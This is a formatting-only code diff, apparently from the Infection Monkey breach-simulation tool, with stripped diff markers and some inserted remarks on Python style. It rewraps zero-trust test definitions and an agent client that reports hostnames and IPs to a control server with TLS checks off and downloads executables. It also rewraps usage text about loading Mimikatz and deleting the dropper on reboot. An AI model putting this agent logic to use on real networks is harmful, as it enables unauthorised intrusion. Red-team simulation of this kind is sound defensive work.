POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
PRINCIPLE_KEY:PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY:[DEVICES],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
},
TEST_SCHEDULED_EXECUTION: {
TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security "
TEST_SCHEDULED_EXECUTION:{
TEST_EXPLANATION_KEY:"The Monkey was executed in a scheduled manner.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_VERIFY:"Monkey was executed in a scheduled manner. Locate this activity in "
"User-Behavior security "
"software.",
STATUS_PASSED: "Monkey failed to execute in a scheduled manner.",
STATUS_PASSED:"Monkey failed to execute in a scheduled manner.",
},
PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
PILLARS_KEY: [PEOPLE, NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
PRINCIPLE_KEY:PRINCIPLE_USER_BEHAVIOUR,
PILLARS_KEY:[PEOPLE, NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_VERIFY],
},
TEST_DATA_ENDPOINT_ELASTIC: {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts "
TEST_DATA_ENDPOINT_ELASTIC:{
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to "
"ElasticSearch instances.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey accessed ElasticSearch instances. Limit access to data by "
"encrypting it in in-transit.",
STATUS_PASSED:"Monkey didn't find open ElasticSearch instances. If you have such "
"instances, look for alerts "
"that indicate attempts to access them. ",
},
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_DATA_ENDPOINT_HTTP: {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate "
TEST_DATA_ENDPOINT_HTTP:{
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to HTTP " "servers.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey accessed HTTP servers. Limit access to data by encrypting it in"
" in-transit.",
STATUS_PASSED:"Monkey didn't find open HTTP servers. If you have such servers, "
"look for alerts that indicate "
"attempts to access them. ",
},
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_DATA_ENDPOINT_POSTGRESQL: {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to PostgreSQL servers.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, look for alerts that "
TEST_DATA_ENDPOINT_POSTGRESQL:{
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to " "PostgreSQL servers.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey accessed PostgreSQL servers. Limit access to data by encrypting"
" it in in-transit.",
STATUS_PASSED:"Monkey didn't find open PostgreSQL servers. If you have such servers, "
"look for alerts that "
"indicate attempts to access them. ",
},
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_TUNNELING: {
TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - "
TEST_TUNNELING:{
TEST_EXPLANATION_KEY:"The Monkey tried to tunnel traffic using other monkeys.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey tunneled its traffic using other monkeys. Your network policies "
"are too permissive - "
"restrict them. "
},
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED],
PRINCIPLE_KEY:PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY:[NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED],
},
TEST_COMMUNICATE_AS_NEW_USER: {
TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - "
TEST_COMMUNICATE_AS_NEW_USER:{
TEST_EXPLANATION_KEY:"The Monkey tried to create a new user and communicate "
"with the internet from it.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey caused a new user to access the network. Your network policies "
"are too permissive - "
"restrict them to MAC only.",
STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network.",
STATUS_PASSED:"Monkey wasn't able to cause a new user to access the network.",
},
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY:[PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES: {
TEST_EXPLANATION_KEY: "ScoutSuite assessed cloud firewall rules and settings.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found overly permissive firewall rules.",
STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules.",
TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES:{
TEST_EXPLANATION_KEY:"ScoutSuite assessed cloud firewall rules and settings.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found overly permissive firewall rules.",
STATUS_PASSED:"ScoutSuite found no problems with cloud firewall rules.",
},
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY: [NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY:[NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_UNENCRYPTED_DATA: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing unencrypted data.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found resources with unencrypted data.",
STATUS_PASSED: "ScoutSuite found no resources with unencrypted data.",
TEST_SCOUTSUITE_UNENCRYPTED_DATA:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for resources containing " "unencrypted data.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found resources with unencrypted data.",
STATUS_PASSED:"ScoutSuite found no resources with unencrypted data.",
},
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_DATA_LOSS_PREVENTION: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not protected against data loss.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found resources not protected against data loss.",
STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss.",
TEST_SCOUTSUITE_DATA_LOSS_PREVENTION:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for resources which are not "
"protected against data loss.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found resources not protected against data loss.",
STATUS_PASSED:"ScoutSuite found that all resources are secured against data loss.",
},
PRINCIPLE_KEY: PRINCIPLE_DISASTER_RECOVERY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_DISASTER_RECOVERY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_SECURE_AUTHENTICATION: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' authentication.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found issues related to users' authentication.",
STATUS_PASSED: "ScoutSuite found no issues related to users' authentication.",
TEST_SCOUTSUITE_SECURE_AUTHENTICATION:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for issues related to users' " "authentication.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found issues related to users' authentication.",
STATUS_PASSED:"ScoutSuite found no issues related to users' authentication.",
},
PRINCIPLE_KEY: PRINCIPLE_SECURE_AUTHENTICATION,
PILLARS_KEY: [PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_SECURE_AUTHENTICATION,
PILLARS_KEY:[PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access policies.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found permissive user access policies.",
STATUS_PASSED: "ScoutSuite found no issues related to user access policies.",
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for permissive user access " "policies.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found permissive user access policies.",
STATUS_PASSED:"ScoutSuite found no issues related to user access policies.",
},
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY: [PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY:[PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_LOGGING: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for issues, related to logging.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found logging issues.",
STATUS_PASSED: "ScoutSuite found no logging issues.",
TEST_SCOUTSUITE_LOGGING:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for issues, related to logging.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found logging issues.",
STATUS_PASSED:"ScoutSuite found no logging issues.",
},
PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY: [AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY:[AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_SERVICE_SECURITY: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for service security issues.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found service security issues.",
STATUS_PASSED: "ScoutSuite found no service security issues.",
TEST_SCOUTSUITE_SERVICE_SECURITY:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for service security issues.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found service security issues.",
STATUS_PASSED:"ScoutSuite found no service security issues.",
},
PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY: [DEVICES, NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY:[DEVICES, NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
}
@ -284,13 +315,13 @@ EVENT_TYPE_MONKEY_LOCAL = "monkey_local"
EVENT_TYPES = (EVENT_TYPE_MONKEY_LOCAL, EVENT_TYPE_MONKEY_NETWORK)
PILLARS_TO_TESTS = {
DATA: [],
PEOPLE: [],
NETWORKS: [],
DEVICES: [],
WORKLOADS: [],
VISIBILITY_ANALYTICS: [],
AUTOMATION_ORCHESTRATION: [],
DATA:[],
PEOPLE:[],
NETWORKS:[],
DEVICES:[],
WORKLOADS:[],
VISIBILITY_ANALYTICS:[],
AUTOMATION_ORCHESTRATION:[],
}
PRINCIPLES_TO_TESTS = {}
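
Several entries above lean on adjacent string literals: the stray empty "" literals inside PRINCIPLES concatenate to nothing, and one-line pairs such as "...unencrypted access to HTTP " "servers." are joined at compile time. The pattern is legal but easy to confuse with a forgotten comma, which silently merges two list or dict items instead of raising an error. A small sketch of that failure mode:

# Two explanation strings were meant to be two list items, but the missing
# comma after the first turns them into one concatenated item.
explanations = [
    "The Monkey scanned for unencrypted access to HTTP servers."
    "The Monkey scanned for unencrypted access to PostgreSQL servers.",
]

assert len(explanations) == 1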

View File

@ -159,7 +159,8 @@ class SingleIpRange(NetworkRange):
@staticmethod
def string_to_host(string_):
"""
Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name and ip
Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name
and ip
:param string_: String that was entered in "Scan IP/subnet list"
:return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
"""

View File

@ -4,8 +4,10 @@ from urllib.parse import urlparse
def get_host_from_network_location(network_location: str) -> str:
"""
URL structure is "<scheme>://<net_loc>/<path>;<params>?<query>#<fragment>" (https://tools.ietf.org/html/rfc1808.html)
And the net_loc is "<user>:<password>@<host>:<port>" (https://tools.ietf.org/html/rfc1738#section-3.1)
URL structure is "<scheme>://<net_loc>/<path>;<params>?<query>#<fragment>" (
https://tools.ietf.org/html/rfc1808.html)
And the net_loc is "<user>:<password>@<host>:<port>" (
https://tools.ietf.org/html/rfc1738#section-3.1)
:param network_location: server network location
:return: host part of the network location
"""

View File

@ -14,8 +14,10 @@ def get_ip_in_src_and_not_in_dst(ip_addresses, source_subnet, target_subnet):
def get_ip_if_in_subnet(ip_addresses, subnet):
"""
:param ip_addresses: IP address list.
:param subnet: Subnet to check if one of ip_addresses is in there. This is common.network.network_range.NetworkRange
:return: The first IP in ip_addresses which is in the subnet if there is one, otherwise returns None.
:param subnet: Subnet to check if one of ip_addresses is in there. This is
common.network.network_range.NetworkRange
:return: The first IP in ip_addresses which is in the subnet if there is one, otherwise
returns None.
"""
for ip_address in ip_addresses:
if subnet.is_in_range(ip_address):

View File

@ -14,27 +14,29 @@ class ScanStatus(Enum):
class UsageEnum(Enum):
SMB = {
ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR.",
ScanStatus.USED.value:"SMB exploiter ran the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value:"SMB exploiter failed to run the monkey by creating a service "
"via MS-SCMR.",
}
MIMIKATZ = {
ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed.",
ScanStatus.USED.value:"Windows module loader was used to load Mimikatz DLL.",
ScanStatus.SCANNED.value:"Monkey tried to load Mimikatz DLL, but failed.",
}
MIMIKATZ_WINAPI = {
ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz.",
ScanStatus.USED.value:"WinAPI was called to load mimikatz.",
ScanStatus.SCANNED.value:"Monkey tried to call WinAPI to load mimikatz.",
}
DROPPER = {
ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
ScanStatus.USED.value:"WinAPI was used to mark monkey files for deletion on next boot."
}
SINGLETON_WINAPI = {
ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.",
ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton"
ScanStatus.USED.value:"WinAPI was called to acquire system singleton for monkey's "
"process.",
ScanStatus.SCANNED.value:"WinAPI call to acquire system singleton"
" for monkey process wasn't successful.",
}
DROPPER_WINAPI = {
ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
ScanStatus.USED.value:"WinAPI was used to mark monkey files for deletion on next boot."
}

View File

@ -1,4 +1,5 @@
# To get the version from shell, run `python ./version.py` (see `python ./version.py -h` for details).
# To get the version from shell, run `python ./version.py` (see `python ./version.py -h` for
# details).
import argparse
from pathlib import Path
@ -17,7 +18,8 @@ def get_version(build=BUILD):
def print_version():
parser = argparse.ArgumentParser()
parser.add_argument(
"-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str
"-b", "--build", default=BUILD, help="Choose the build string for this version.",
type=str
)
args = parser.parse_args()
print(get_version(args.build))
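
The add_argument wrap above moves only type=str to its own line. When a call cannot fit on one line, black's usual output is one argument per line with a trailing comma. A sketch of that shape, with BUILD stubbed to a placeholder value so the snippet stands alone:

import argparse

BUILD = "dev"  # placeholder; the real default comes from the module

parser = argparse.ArgumentParser()
parser.add_argument(
    "-b",
    "--build",
    default=BUILD,
    help="Choose the build string for this version.",
    type=str,
)
args = parser.parse_args([])
print(args.build)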

View File

@ -227,7 +227,8 @@ class Configuration(object):
@staticmethod
def hash_sensitive_data(sensitive_data):
"""
Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data plain-text, as the log is
Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data
plain-text, as the log is
saved on client machines plain-text.
:param sensitive_data: the data to hash.

View File

@ -23,7 +23,6 @@ from infection_monkey.utils.exceptions.planned_shutdown_exception import Planned
__author__ = "hoffer"
requests.packages.urllib3.disable_warnings()
LOG = logging.getLogger(__name__)
@ -32,7 +31,8 @@ DOWNLOAD_CHUNK = 1024
PBA_FILE_DOWNLOAD = "https://%s/api/pba/download/%s"
# random number greater than 5,
# to prevent the monkey from just waiting forever to try and connect to an island before going elsewhere.
# to prevent the monkey from just waiting forever to try and connect to an island before going
# elsewhere.
TIMEOUT_IN_SECONDS = 15
@ -52,13 +52,13 @@ class ControlClient(object):
has_internet_access = check_internet_access(WormConfiguration.internet_services)
monkey = {
"guid": GUID,
"hostname": hostname,
"ip_addresses": local_ips(),
"description": " ".join(platform.uname()),
"internet_access": has_internet_access,
"config": WormConfiguration.as_dict(),
"parent": parent,
"guid":GUID,
"hostname":hostname,
"ip_addresses":local_ips(),
"description":" ".join(platform.uname()),
"internet_access":has_internet_access,
"config":WormConfiguration.as_dict(),
"parent":parent,
}
if ControlClient.proxies:
@ -67,7 +67,7 @@ class ControlClient(object):
requests.post(
"https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(monkey),
headers={"content-type": "application/json"},
headers={"content-type":"application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=20,
@ -134,14 +134,15 @@ class ControlClient(object):
"https://%s/api/monkey/%s"
% (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps(monkey),
headers={"content-type": "application/json"},
headers={"content-type":"application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
return {}
@ -154,18 +155,20 @@ class ControlClient(object):
)
return
try:
telemetry = {"monkey_guid": GUID, "telem_category": telem_category, "data": json_data}
telemetry = {"monkey_guid":GUID, "telem_category":telem_category, "data":json_data}
requests.post(
"https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123
"https://%s/api/telemetry" % (WormConfiguration.current_server,),
# noqa: DUO123
data=json.dumps(telemetry),
headers={"content-type": "application/json"},
headers={"content-type":"application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
@staticmethod
@ -173,18 +176,19 @@ class ControlClient(object):
if not WormConfiguration.current_server:
return
try:
telemetry = {"monkey_guid": GUID, "log": json.dumps(log)}
telemetry = {"monkey_guid":GUID, "log":json.dumps(log)}
requests.post(
"https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(telemetry),
headers={"content-type": "application/json"},
headers={"content-type":"application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
@staticmethod
@ -202,7 +206,8 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
return
@ -233,15 +238,16 @@ class ControlClient(object):
requests.patch(
"https://%s/api/monkey/%s"
% (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps({"config_error": True}),
headers={"content-type": "application/json"},
data=json.dumps({"config_error":True}),
headers={"content-type":"application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
return {}
@ -281,7 +287,7 @@ class ControlClient(object):
else:
arch = "x86_64"
return {"os": {"type": os, "machine": arch}}
return {"os":{"type":os, "machine":arch}}
@staticmethod
def download_monkey_exe_by_filename(filename, size):
@ -310,7 +316,8 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
@staticmethod
@ -326,7 +333,7 @@ class ControlClient(object):
"https://%s/api/monkey/download"
% (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(host_dict),
headers={"content-type": "application/json"},
headers={"content-type":"application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=LONG_REQUEST_TIMEOUT,
@ -343,7 +350,8 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
return None, None
@ -371,7 +379,8 @@ class ControlClient(object):
def get_pba_file(filename):
try:
return requests.get(
PBA_FILE_DOWNLOAD % (WormConfiguration.current_server, filename), # noqa: DUO123
PBA_FILE_DOWNLOAD % (WormConfiguration.current_server, filename),
# noqa: DUO123
verify=False,
proxies=ControlClient.proxies,
timeout=LONG_REQUEST_TIMEOUT,
@ -412,7 +421,10 @@ class ControlClient(object):
@staticmethod
def can_island_see_port(port):
try:
url = f"https://{WormConfiguration.current_server}/api/monkey_control/check_remote_port/{port}"
url = (
f"https://{WormConfiguration.current_server}/api/monkey_control"
f"/check_remote_port/{port}"
)
response = requests.get(url, verify=False, timeout=SHORT_REQUEST_TIMEOUT)
response = json.loads(response.content.decode())
return response["status"] == "port_visible"
@ -423,7 +435,7 @@ class ControlClient(object):
def report_start_on_island():
requests.post(
f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
data=json.dumps({"started_on_island": True}),
data=json.dumps({"started_on_island":True}),
verify=False,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
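
The check_remote_port change above shows the cleaner way this commit wraps long f-strings: adjacent literals inside parentheses, with an f prefix on every piece that contains a placeholder (a piece without the prefix would be kept verbatim, braces and all). A sketch with placeholder values:

# Placeholder values purely for illustration.
current_server = "198.51.100.7:5000"
port = 443

url = (
    f"https://{current_server}/api/monkey_control"
    f"/check_remote_port/{port}"
)

assert url == "https://198.51.100.7:5000/api/monkey_control/check_remote_port/443"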

View File

@ -53,8 +53,8 @@ class MonkeyDrops(object):
self.opts, _ = arg_parser.parse_known_args(args)
self._config = {
"source_path": os.path.abspath(sys.argv[0]),
"destination_path": self.opts.location,
"source_path":os.path.abspath(sys.argv[0]),
"destination_path":self.opts.location,
}
def initialize(self):
@ -147,20 +147,21 @@ class MonkeyDrops(object):
if OperatingSystem.Windows == SystemInfoCollector.get_os():
monkey_cmdline = (
MONKEY_CMDLINE_WINDOWS % {"monkey_path": self._config["destination_path"]}
MONKEY_CMDLINE_WINDOWS % {"monkey_path":self._config["destination_path"]}
+ monkey_options
)
else:
dest_path = self._config["destination_path"]
# In linux we have a more complex commandline. There's a general outer one, and the inner one which actually
# In linux we have a more complex commandline. There's a general outer one,
# and the inner one which actually
# runs the monkey
inner_monkey_cmdline = (
MONKEY_CMDLINE_LINUX % {"monkey_filename": dest_path.split("/")[-1]}
MONKEY_CMDLINE_LINUX % {"monkey_filename":dest_path.split("/")[-1]}
+ monkey_options
)
monkey_cmdline = GENERAL_CMDLINE_LINUX % {
"monkey_directory": dest_path[0 : dest_path.rfind("/")],
"monkey_commandline": inner_monkey_cmdline,
"monkey_directory":dest_path[0: dest_path.rfind("/")],
"monkey_commandline":inner_monkey_cmdline,
}
monkey_process = subprocess.Popen(
@ -188,7 +189,8 @@ class MonkeyDrops(object):
try:
if (
(self._config["source_path"].lower() != self._config["destination_path"].lower())
(self._config["source_path"].lower() != self._config[
"destination_path"].lower())
and os.path.exists(self._config["source_path"])
and WormConfiguration.dropper_try_move_first
):
@ -207,7 +209,8 @@ class MonkeyDrops(object):
dropper_source_path_ctypes, None, MOVEFILE_DELAY_UNTIL_REBOOT
):
LOG.debug(
"Error marking source file '%s' for deletion on next boot (error %d)",
"Error marking source file '%s' for deletion on next boot (error "
"%d)",
self._config["source_path"],
ctypes.windll.kernel32.GetLastError(),
)
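
The slice change above, from dest_path[0 : ...] to dest_path[0: ...], touches one of the few places where black and flake8 genuinely disagree: black may put a space on both sides of a slice colon when an operand is an expression, and pycodestyle then flags the space before the colon as E203, so projects running both tools usually add E203 to flake8's ignore list. A sketch of the slice itself with a placeholder path:

dest_path = "/tmp/monkey-linux-64"  # placeholder path for illustration

# Everything up to (not including) the last '/', i.e. the containing directory.
monkey_directory = dest_path[0 : dest_path.rfind("/")]

assert monkey_directory == "/tmp"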

View File

@ -10,7 +10,6 @@ from infection_monkey.utils.plugins.plugin import Plugin
__author__ = "itamar"
logger = logging.getLogger(__name__)
@ -37,7 +36,8 @@ class HostExploiter(Plugin):
EXPLOIT_TYPE = ExploitType.VULNERABILITY
# Determines if successful exploitation should stop further exploit attempts on that machine.
